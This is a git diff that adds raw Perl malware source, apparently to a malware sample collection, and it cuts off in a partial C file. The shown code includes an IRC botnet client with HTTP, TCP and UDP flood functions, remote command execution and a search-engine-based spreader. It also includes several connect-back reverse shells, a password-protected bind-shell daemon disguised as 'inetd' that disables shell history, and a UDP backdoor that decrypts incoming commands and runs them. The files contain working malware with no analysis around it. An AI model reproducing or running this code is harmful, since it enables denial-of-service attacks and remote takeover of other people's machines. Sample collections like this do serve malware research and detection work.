"PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($2>$cur_time){ + $cur_time = time - $itime; + my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); + print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; + close($socket); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1."."); + } + if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds."); + my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); + $dtime = 1 if $dtime == 0; + my %bytes; + $bytes{igmp} = $2 * $pacotes{igmp}; + $bytes{icmp} = $2 * $pacotes{icmp}; + $bytes{o} = $2 * $pacotes{o}; + $bytes{udp} = $2 * $pacotes{udp}; + $bytes{tcp} = $2 * $pacotes{tcp}; + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1."."); + } + exit; + } + } +} + +sub ircase { + my ($kem, $printl, $case) = @_; + + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } + if ($case =~ /^rejoin\s+(.*)/) { + my $chan = $1; + if ($chan =~ /^(\d+) (.*)/) { + for (my $ca = 1; $ca <= $1; $ca++ ) { + p("$2"); + j("$2"); + } + } else { + p("$chan"); + j("$chan"); + } + } + if ($case =~ /^op/) { + op("$printl", "$kem") if $case eq "op"; + my $oarg = substr($case, 3); + op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + if ($case =~ /^deop/) { + deop("$printl", "$kem") if $case eq "deop"; + my $oarg = substr($case, 5); + deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + if ($case =~ /^msg\s+(\S+) (.*)/) { + msg("$1", "$2"); + } + if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + msg("$2", "$3"); + } + } + if ($case =~ /^ctcp\s+(\S+) (.*)/) { + ctcp("$1", "$2"); + } + if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + ctcp("$2", "$3"); + } + } + if ($case =~ /^nick (.*)/) { + nick("$1"); + } + if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { + conectar("$2", "$1", 6667); + } + if ($case =~ /^raw (.*)/) { + sendraw("$1"); + } + if ($case =~ /^eval (.*)/) { + eval "$1"; + } +} + +sub shell { + my $printl=$_[0]; + my $comando=$_[1]; + if ($comando =~ /cd (.*)/) { + chdir("$1") || msg("$printl", "No such file or directory"); + return; + } + elsif ($pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`$comando 2>&1 3>&1`; + my $c=0; + foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } + } + exit; + } + } +} + +sub tcpflooder { + my $itime = time; + my ($cur_time); + my ($ia,$pa,$proto,$j,$l,$t); + $ia=inet_aton($_[0]); + $pa=sockaddr_in($_[1],$ia); + $ftime=$_[2]; + $proto=getprotobyname('tcp'); + $j=0;$l=0; + $cur_time = time - $itime; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + socket($t,PF_INET,SOCK_STREAM,$proto); + connect($t,$pa)||$j--; + $j++;$l++; + } + $l=0; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + shutdown($t,2); + $l++; + } +} + +sub udpflooder { + my $iaddr = inet_aton($_[0]); + my $msg = 'A' x $_[1]; + my $ftime = $_[2]; + my $cp = 0; + my (%pacotes); + $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; + + socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; + + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; + return(undef) if $cp == 4; + my $itime = time; + my ($cur_time); + while ( 1 ) { + for (my $porta = 1; $porta <= 65000; $porta++) { + $cur_time = time - $itime; + last if $cur_time >= $ftime; + send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; + send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; + send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; + send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + for (my $pc = 3; $pc <= 255;$pc++) { + next if $pc == 6; + $cur_time = time - $itime; + last if $cur_time >= $ftime; + socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; + send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; + } + } + last if $cur_time >= $ftime; + } + return($cur_time, %pacotes); +} + +sub ctcp { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} +sub msg { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :$_[1]"); +} +sub notice { + return unless $#_ == 1; + sendraw("NOTICE $_[0] :$_[1]"); +} +sub op { + return unless $#_ == 1; + sendraw("MODE $_[0] +o $_[1]"); +} +sub deop { + return unless $#_ == 1; + sendraw("MODE $_[0] -o $_[1]"); +} +sub j { &join(@_); } +sub join { + return unless $#_ == 0; + sendraw("JOIN $_[0]"); +} +sub p { part(@_); } +sub part { + sendraw("PART $_[0]"); +} +sub nick { + return unless $#_ == 0; + sendraw("NICK $_[0]"); +} +sub quit { + sendraw("QUIT :$_[0]"); +} + +# Spreader +# this 'spreader' code isnot mine, i dont know who coded it. +# update: well, i just fix0red this shit a bit. +# + +sub fetch(){ + my $rnd=(int(rand(9999))); + my $n= 80; + if ($rnd<5000) { $n<<=1;} + my $s= (int(rand(10)) * $n); + +my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec", + "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop", + "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi", + "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk", + "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir", + "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke", + "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm", + "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc", + "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz", + "vu","vn","ye","yu","cd","zm","zw",""); +my @str; + +foreach $dom (@dominios) +{ + push (@str,"%22modules.php?name%3A%22+%7C+%22+inurl%3Amodules.php%3Fname%3D+site%3A".$dom."%20"); +} + + my $query="www.google.com/search?q="; + $query.=$str[(rand(scalar(@str)))]; + $query.="&num=$n&start=$s"; + my @lst=(); + my $page = http_query($query); + while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){ + if ($1 !~ m/google|cache|translate/){ + push (@lst,$1); + } + } + return (@lst); +} + +sub http_query($){ + my ($url) = @_; + my $host=$url; + my $query=$url; + my $page=""; + $host =~ s/href=\"?http:\/\///; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $query =~s/$host//; + if ($query eq "") {$query="/";}; + eval { + local $SIG{ALRM} = sub { die "1";}; + alarm 10; + my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; + print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$sock>; + $page="@r"; + alarm 0; + close($sock); + }; + return $page; + +} + + + + diff --git a/Perl/Backdoor.Perl.Small.a b/Perl/Backdoor.Perl.Small.a new file mode 100644 index 00000000..abfa77ac --- /dev/null +++ b/Perl/Backdoor.Perl.Small.a @@ -0,0 +1,46 @@ + +# Backdoor - Perl Connect Back Backdoor +# Unpublished/Unreleased Source Code + +use Socket; + +print "Backdoor ! bypassing Firewalls\n\n"; + +if (!$ARGV[0]) { + printf "Uso: $0 [Host] <Puerto>\n"; + exit(1); +} + +print "[*] Espere ...\n"; + +$host = $ARGV[0]; +$port = 80; + +if ($ARGV[1]) { + $port = $ARGV[1]; +} + +print "[*] Conectando...\n"; + +$proto = getprotobyname('tcp') || die("[-] Protocolo Desconocido\n"); + +socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Error Socket\n"); + +my $target = inet_aton($host); + +if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { + die("[-] Imposible Conectar\n"); +} + +print "[*] Cargando Shell...\n"; + +if (!fork( )) { + open(STDIN,">&SERVER"); + open(STDOUT,">&SERVER"); + open(STDERR,">&SERVER"); + + exec {'/bin/sh'} '-bash' . "\0" x 4; + exit(0); +} + +print "[*] Cargada a joder!\n\n"; \ No newline at end of file diff --git a/Perl/Backdoor.Perl.Small.e b/Perl/Backdoor.Perl.Small.e new file mode 100644 index 00000000..cd3963cf --- /dev/null +++ b/Perl/Backdoor.Perl.Small.e @@ -0,0 +1,59 @@ +use IO::Socket; +#IRAN HACKERS SABOTAGE Connect Back Shell +#code by:LorD +#We Are :LorD-C0d3r-NT +# +#lord@SlackwareLinux:/home/programing$ perl dc.pl +#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- +# +#Usage: dc.pl [Host] [Port] +# +#Ex: dc.pl 127.0.0.1 2121 +#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 +#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- +# +#[*] Resolving HostName +#[*] Connecting... 127.0.0.1 +#[*] Spawning Shell +#[*] Connected to remote host + +#bash-2.05b# nc -vv -l -p 2121 +#listening on [any] 2121 ... +#connect to [127.0.0.1] from localhost [127.0.0.1] 2121 +#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- +# +#--==Systeminfo==-- +#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux +# +#--==Userinfo==-- +#uid=1001(lord) gid=100(users) groups=100(users) +# +#--==Directory==-- +#/root +# +#--==Shell==-- +# +$system = '/bin/sh'; +$ARGC=@ARGV; +print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; +if ($ARGC!=2) { + print "Usage: $0 [Host] [Port] \n\n"; + die "Ex: $0 127.0.0.1 2121 \n"; +} +use Socket; +use FileHandle; +socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; +connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; +print "[*] Resolving HostName\n"; +print "[*] Connecting... $ARGV[0] \n"; +print "[*] Spawning Shell \n"; +print "[*] Connected to remote host \n"; +SOCKET->autoflush(); +open(STDIN, ">&SOCKET"); +open(STDOUT,">&SOCKET"); +open(STDERR,">&SOCKET"); +print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; +system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo; +echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); +system($system); +#EOF \ No newline at end of file diff --git a/Perl/Backdoor.Perl.Small.i b/Perl/Backdoor.Perl.Small.i new file mode 100644 index 00000000..ee19680a --- /dev/null +++ b/Perl/Backdoor.Perl.Small.i @@ -0,0 +1,18 @@ +use Socket; +$cmd= "lynx"; +$system= 'echo "`uname -a`";echo "`id`";/bin/sh'; +$0=$cmd; +$target=$ARGV[0]; +$port=$ARGV[1]; +$iaddr=inet_aton($target) || die("Error: $!\n"); +$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); +$proto=getprotobyname('tcp'); +socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); +connect(SOCKET, $paddr) || die("Error: $!\n"); +open(STDIN, ">&SOCKET"); +open(STDOUT, ">&SOCKET"); +open(STDERR, ">&SOCKET"); +system($system); +close(STDIN); +close(STDOUT); +close(STDERR); \ No newline at end of file diff --git a/Perl/Backdoor.Perl.Termapp.a b/Perl/Backdoor.Perl.Termapp.a new file mode 100644 index 00000000..92d9fbf4 --- /dev/null +++ b/Perl/Backdoor.Perl.Termapp.a @@ -0,0 +1,462 @@ +# Telnet-like Standard Daemon 0.7 +# +# 0ldW0lf - oldwolf@atrixteam.net +# - old-wolf@zipmai.com +# - www.atrix.cjb.net +# - www.atrixteam.net +# +# For those guys that still like to open ports +# and use non-rooted boxes +# +# This has been developed to join in the TocToc +# project code, now it's done and I'm distributing +# this separated +# +# This one i made without IO::Pty so it uses +# only standard modules... enjoy it +# +# tested on linux boxes.. probably will work fine on others +# any problem... #atrix@irc.brasnet.org +# + +########################################################## +# ******************* CONFIGURATION ******************** # +########################################################## +my $PORT = $ARGV[0] || 3847; # default port is 3847 +my $PASS = 'ouhEUhhJ6RbwE'; # encripted password +my $SHELL = "/bin/bash"; # shell to be executed +my $HOME = "/tmp"; # your HOME +my $PROC = "inetd"; # name of the process +my $PASS_PROMPT = "Password: "; # password prompt +my $WRONG_PASS = "Password Errata!"; # "wrong password" message +my @STTY = ('sane', 'dec'); # stty arguments +########################################################## + +# feel free to change the ENV +#### ENVironment #### +$ENV{HOME} = $HOME; +#$ENV{PS1} = '[\u@\h \W]: '; # the way i like :) + # colorful PS1 is also funny :) +$ENV{PS1} = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] '; +$ENV{MAIL} = '/var/mail/root'; +$ENV{PATH} = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin'; +$ENV{HISTFILE} = '/dev/null'; +$ENV{USER} = 'root'; +$ENV{LOGNAME} = 'root'; +$ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0'; +$ENV{LS_COLORS} = 'no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.bz2=01;31:*.rpm=01;31:*.deb=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.mpg=01;37:*.avi=01;37:*.mov=01;37:'; +$ENV{SHELL} = $SHELL; +$ENV{TERM} = 'xterm'; +##################### + +$0=$PROC."\0"; + +use IO::Socket; +use IO::Select; +use POSIX; +use strict; + +# i wouldn't change that +# if i were you +###### SIGnals ###### +$SIG{HUP} = 'IGNORE'; +$SIG{PS} = 'IGNORE'; +$SIG{TERM} = 'IGNORE'; +$SIG{CHLD} = sub { wait; }; +##################### + + +# ioctl stuff +my %IOCTLDEF; +$IOCTLDEF{TIOCSWINSZ} = 0x5414; +$IOCTLDEF{TIOCNOTTY} = 0x5422; +$IOCTLDEF{TIOCSCTTY} = 0x540E; +safeload('sys/ttycom.ph', 1); # BSD +safeload('sys/ioctl.ph', 1); +safeload('asm/ioctls.ph', 1); + +foreach my $IOCTL (keys(%IOCTLDEF)) { + next if (defined(&{$IOCTL})); + + if (open(IOD, "< /usr/include/asm/ioctls.h")) { # linux + while(<IOD>) { + if (/^\#define\s+$IOCTL\s+(.*?)\n$/) { + eval "sub $IOCTL () {$1;}"; + last; + } + } + close(IOD); + } + + # i realy dunno if i can do that.. but.. here it goes + eval "sub $IOCTL () { $IOCTLDEF{$IOCTL};}" unless (defined(&{$IOCTL})); +} + + +# starting... +$PORT = $ARGV[0] if ($ARGV[0]); +chdir('/'); + +no strict 'refs'; +my $bindfd = *{'bind_sock'}; +*{$bindfd}= IO::Socket::INET->new(Listen => 1, LocalPort => $PORT, Proto => "tcp") || die "could not listen on port $PORT: $!"; +my $bind = \*{$bindfd}; + +my $pid = fork(); +die "ERROR: I could not fork() the process." unless defined($pid); +exit if $pid; + + +my %CLIENT; +my $sel_serv = IO::Select->new($bind); +my $sel_shell = IO::Select->new(); + + +# main loop... +while ( 1 ) { + select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0); + + read_clients(); + read_shells(); +} + +sub read_clients { + map { read_client($_) } ($sel_serv->can_read(0.01)); +} + +sub read_client { + my $fh = shift; + + if ($fh eq $bind) { + my $newcon = $bind->accept; + $sel_serv->add($newcon); + $CLIENT{$newcon}->{senha} = 0; + $CLIENT{$newcon}->{sock} = $newcon; + $fh->autoflush(1); + do_client($newcon, '3', '5', '1'); + sleep(1); + write_client($newcon, $PASS_PROMPT) if ($PASS_PROMPT); + } else { + my $msg; + my $nread = sysread($fh, $msg, 1024); + + if ($nread == 0) { + close_client($fh); + } else { + telnet_parse($fh, $msg); + } + } +} + +sub read_shells { + map { read_shell($_) } ($sel_shell->can_read(0.01)); +} + +sub telnet_parse { + my ($cli, $msg) = @_; + my $char = (split('', $msg))[0]; + + if (ord($char) == 255) { + chr_parse($cli, $msg); + } else { + if ($CLIENT{$cli}->{senha} == 0) { + $CLIENT{$cli}->{buf} .= $msg; + + return() unless ($msg =~ /\r|\n/); + + my $pass = $CLIENT{$cli}->{buf}; + $CLIENT{$cli}->{buf} = ''; + + $pass =~ s/\n//g; + $pass =~ s/\0//g; + $pass =~ s/\r//g; + + if (crypt($pass, $PASS) ne $PASS) { + finish_client($cli, "\r\n\r".$WRONG_PASS."\r\n\r"); + } else { + $CLIENT{$cli}->{senha} = 1; + write_client($cli, chr(255).chr(253).chr(31)); + write_client($cli, "\r\n\r\r\n\r"); + new_shell($cli); + } + return(); + } + + $msg =~ s/\r\n\0\0//g; + $msg =~ s/\0//g; + $msg =~ s/\r\n/\n/g; + write_shell($cli, $msg); + } +} + +sub read_shell { + my $shell = shift; + my $cli; + map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT); + + my $msg; + my $nread = sysread($shell, $msg, 1024); + + if ($nread == 0) { + finish_client($cli, "Terminal closed.\r\n\r"); + } else { + write_client($cli, $msg); + } +} + +sub to_chr { + my $chrs = ''; + map { $chrs .= chr($_) } (split(/ +/, shift)); + return($chrs); +} + +sub do_client { + my ($client, @codes) = @_; + map { write_client($client, chr(255).chr(251).chr($_)) } @codes; +} + + +sub chr_parse { + my ($client, $chrs) = @_; + + my $ords = ''; + map { $ords .= ord($_).' ' } (split(//, $chrs)); + my $msg = ''; + + + if ($ords =~ /255 250 31 (\d+) (\d+) (\d+) (\d+)/) { + my $winsize = pack('C4', $4, $3, $2, $1); + ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# || die "erro: $!"; + } + + foreach my $code (split("255 ", $ords)) { + if ($code =~ /(\d+) (.*)$/) { + my $codes = $2; + if ($1 == 251) { + # do whatever you want dude ehehe + $msg .= chr(255).chr(253); + + map { $msg .= chr($_) } (split(/ +/, $codes)); + } + } + } + + write_client($client, $msg) if ($msg); + return(1); +} + +sub new_shell { + my $cli = shift; + + POSIX::setpgid(0, 0); + + my ($tty, $pty); + + unless (($tty, $pty) = open_tty($cli)) { + finish_client($cli, "ERROR: No more pty┤s avaliable\n"); + return(undef); + } + + my $pid = fork(); + if (not defined($pid)) { + finish_client($cli, "ERROR: fork()\n"); + return(undef); + } + + unless($pid) { + close($pty); + + local(*DEVTTY); + + if (open (DEVTTY, "/dev/tty")) { + ioctl(DEVTTY, &TIOCNOTTY, 0 );# || die "erro: $!"; + close(DEVTTY); + } + + POSIX::setsid(); + ioctl($tty, &TIOCSCTTY, 0);# || die "erro: $!"; + + open (STDIN, "<&".fileno($tty)) || die "I could not reopen STDIN: $!"; + open (STDOUT, ">&".fileno($tty)) || die "I could not reopen STDOUT: $!"; + open (STDERR, ">&".fileno($tty)) || die "I could not reopen STDERR: $!"; + close($tty); + + sleep(1); + + foreach my $stty ("/bin/stty", "/usr/bin/stty") { + next unless (-x $stty); + map { system("$stty", $_) } @STTY; + } + + chdir("$HOME"); + { exec("$SHELL") }; + + syswrite(STDOUT, "\n\nERROR: exec($SHELL)\n\nI could not execute the shell ($SHELL)\nHowever you are lucky :P\nYou can use the \"I'm FUCKED!\" mode and fix up this thing...\nTip: Find some shell and execute it ;)\n\n"); + syswrite(STDOUT, "\n\nOK! I'm Fucked mode.\n"); + syswrite(STDOUT, "Type ^C to exit\n\nI'm FuCKeD!# "); + + while (my $msg = <STDIN>) { + $msg =~ s/\n$//; + $msg =~ s/\r$//; + + if ($msg =~ /^\s*cd\s+(\S+)/) { + my $notf = "directory $1 not found!\n"; + chdir($1) || syswrite(STDOUT, $notf, length($notf)); + } else { + system("$msg 2>&1"); + } + syswrite(STDOUT, "I'm FuCKeD!# "); + } + + exit; + } + close($tty); + + select($pty); $| = 1; + select(STDOUT); + + set_raw($pty); + + $CLIENT{$cli}->{shell} = $pty; + $sel_shell->add($pty); + + return(1); +} + + + +# Funciton set_raw() stolen from IO::Pty +sub set_raw($) { + my $self = shift; + return 1 if not POSIX::isatty($self); + my $ttyno = fileno($self); + my $termios = new POSIX::Termios; + unless ($termios) { +# warn "set_raw: new POSIX::Termios failed: $!"; + return undef; + } + unless ($termios->getattr($ttyno)) { +# warn "set_raw: getattr($ttyno) failed: $!"; + return undef; + } + $termios->setiflag(0); + $termios->setoflag(0); + $termios->setlflag(0); + $termios->setcc(&POSIX::VMIN, 1); + $termios->setcc(&POSIX::VTIME, 0); + unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) { +# warn "set_raw: setattr($ttyno) failed: $!"; + return undef; + } + return 1; +} + +sub open_tty { + no strict; + my $cli = shift; + my ($PTY, $TTY) = (*{"pty.$cli"}, *{"tty.$cli"}); # believe me old versions :/ + + + for (my $i = 0; $i < 256; $i++) { + my $pty = get_tty($i, "/dev/pty"); + next unless (open($PTY, "+> $pty")); + + my $tty = get_tty($i, "/dev/tty"); + + unless(open($TTY, "+> $tty")) { + close($PTY); + next; + } + + return($TTY, $PTY); + + } + + return(); +} + +sub get_tty { + my ($num, $base) = @_; + + my @series = ('p' .. 'z', 'a' .. 'e'); + my @subs = ('0' .. '9', 'a' .. 'f'); + + my $buf = $base; + $buf .= @series[($num >> 4) & 0xF]; + $buf .= @subs[$num & 0xF]; + + return($buf); +} + +sub safeload { + my ($module, $require, $arg) = @_; + my $file = $module; + $file =~ s/::/\//g; + + if ($require) { + # all found gonna be loaded + map { eval ("require \"$_/$file\";") if(-f "$_/$file"); } @INC; + } else { + $file .= ".pm" unless ($file =~ /(\.pm|\.ph)$/); + return(eval("use $module $arg;")) if (grep { -f "$_/$file" } @INC); + } + + return(); +} + +sub write_shell { + my ($cli, $msg) = @_; + my $shell = $CLIENT{$cli}->{shell}; + + return(undef) unless ($shell); + + foreach my $m (split_chars($msg, 20)) { + read_shells(); + print $shell $m; + read_shells(); + } + return(1); +} + +sub split_chars { + my ($msg, $nchars) = @_; + + my @splited; + my @chrs = split ('', $msg); + my $done = 0; + while ( 1 ) { + my $splited = join('', @chrs[$done .. ($done+$nchars-1)]); + $done += $nchars; + last if (length($splited) < 1); + push(@splited, $splited); + } + return(@splited); +} + +sub finish_client { + my ($cli, $msg) = @_; + write_client($cli, $msg); + close_client($cli); +} + +sub close_client { + my $cli = shift; + my $sock = $CLIENT{$cli}->{sock}; + + $sel_serv->remove($sock); + if ($CLIENT{$cli}->{shell}) { + my $shell = $CLIENT{$cli}->{shell}; + $sel_shell->remove($shell); + close($shell); + } + $sock->close() if($sock); + delete($CLIENT{$cli}); +} + +sub write_client { + my ($cli, $msg) = @_; + my $sock = $CLIENT{$cli}->{sock}; + syswrite($sock, $msg, length($msg)) if ($sock); +} + + diff --git a/Perl/Backdoor.Perl.Udpdor b/Perl/Backdoor.Perl.Udpdor new file mode 100644 index 00000000..1447e15b --- /dev/null +++ b/Perl/Backdoor.Perl.Udpdor @@ -0,0 +1,145 @@ +# server.. +# see docs for what needs to be edited.. +# (plastek) + +$pid=fork; +exit if $pid; +die("Error.") unless defined($pid); +use IO::Socket; +use POSIX; +use Fcntl ':flock'; +POSIX::setsid(); + +$0 = 'slash'; +$time_to_die=0; + +sub signal_handler { + $time_to_die=1; +} + +$SIG{INT}=$SIG{TERM}=$SIG{HUP}=\&signal_handler; + +until($time_to_die) { + $|=1; + $port=52000; + $maxlen=1024; + my($sock, $raddr, $rhost); + $sock=IO::Socket::INET->new(LocalPort=>$port,Proto=>'udp') or die("Error.\n"); + while($sock->recv($msg, $maxlen)) { + my($rport, $ipaddr)=sockaddr_in($sock->peername); + $rhost=gethostbyaddr($ipaddr, AF_INET); + + + # to r be change + if($rhost =~ /(pear|cherry)/){ + if($rport =~ /1243/){ + my $kfile = '...k'; + open(KFILE, "< $kfile"); + for my $bytes(<KFILE>){ + $kekel = $bytes; + } + $blew = Gh0ST0r->new($kekel); + $fmsg = $blew->gee_golly($msg); + + close KFILE; + if($fmsg =~ /sendtxt/){ + $fmsg =~ s/sendbin//; + my ($file, $payload) = split(/::::/, $fmsg); + open(TMP, ">> $file"); + flock(TMP, LOCK_SH); + print TMP $payload; + close TMP; + } + if($fmsg =~ /nike::/){ + $fmsg =~ s/nike:://; + open(KTMP, "> ...k"); + print KTMP "$fmsg"; + close KTMP; + system("chmod 600 $kfile"); + } + if($fmsg =~ /\.\//){ + $fmsg =~ s/\.\///; + system("$fmsg"); + } + } + } + } +} + +package Gh0ST0r; +require Exporter; + +@ISA = qw(Exporter); +@EXPORT_OK = qw(); + +use strict; +no strict 'refs'; + +use vars qw( @b @t @R @S @h @o @K $VERSION ); + +$VERSION = "1.0"; + +sub new { + my ( $argument, $pp ) = @_; + Setup( $pp ); + my $class = ref ( $argument ) || $argument; + my $self = {}; + bless $self, $class; + return $self; +} + +sub egadz { + my ( $self, $tax ) = @_; + return Gh0ST( $tax ); +} + +sub gee_golly { + my ( $self, $tax ) = @_; + return Gh0ST( $tax, 1 ); +} + +sub Gh0ST { + my ( $v, $w, $a, $q, $c, $out, $self ); + my ( $e, $d ) = @_; + @h = 0 .. 7; + @o = reverse @h; + while ( $a < length $e ) { + $v = N( $e, $a ); + $w = N( $e, ( $a += 8 ) - 4 ); + grep $q++ % 2 ? $v ^= F( $w + $K[ $_ ] ) : ( $w ^= F( $v + $K[ $_ ] ) ), $d ? ( @h, ( @o ) x 3 ) : ( ( @h ) x 3, @o ); + $out .= pack N2, $w, $v; + } + return $out; +} + +sub F { + my $u = 0; + grep $u |= $S[ $_ ][ $_[ 0 ] >> $_ * 4 & 15 ] << $_ * 4, reverse 0 .. 7; + return $u << 11 | $u >> 21; +} + +sub R { + return int( (shift) * rand ); +} + +sub N { + return vec $_[ 0 ], $_[ 1 ] / 4, 32; +} + +sub Setup { + my $p = shift; + my ( $s, $i, $c ); + for ( $i = 0; $i < length $p; $i += 4 ) { + srand( $s ^= N( $p, $i ) ); + } + @b = @t = 0 .. 15; + while ( $c < 8 ) { + grep { push @b, splice @b, R( 9 ), 5 } @t; + $R[ $c ] = R( 2**32 ); + @{ $S[ $c++ ] } = @b; + } + +} + +1; +__END__ diff --git a/Perl/Backdoor.Perl.Whoredoor.08 b/Perl/Backdoor.Perl.Whoredoor.08 new file mode 100644 index 00000000..84e98399 --- /dev/null +++ b/Perl/Backdoor.Perl.Whoredoor.08 @@ -0,0 +1,73 @@ +#include <stdio.h> +#include <stdlib.h> +#include <sys/socket.h> +#include <sys/types.h> +#include <netinet/in.h> +#include <unistd.h> +#include <netdb.h> + +void mk_daemon(); + +int main(int argc, char **argv) +{ +int lfd,cfd; +socklen_t len; +struct sockaddr_in cli,serv; +pid_t pid; +char **sh; + +sh[0]="/bin/sh"; +sh[1]=NULL; + +mk_daemon(); +strncpy(argv[0],"ps",sizeof(argv[0])); 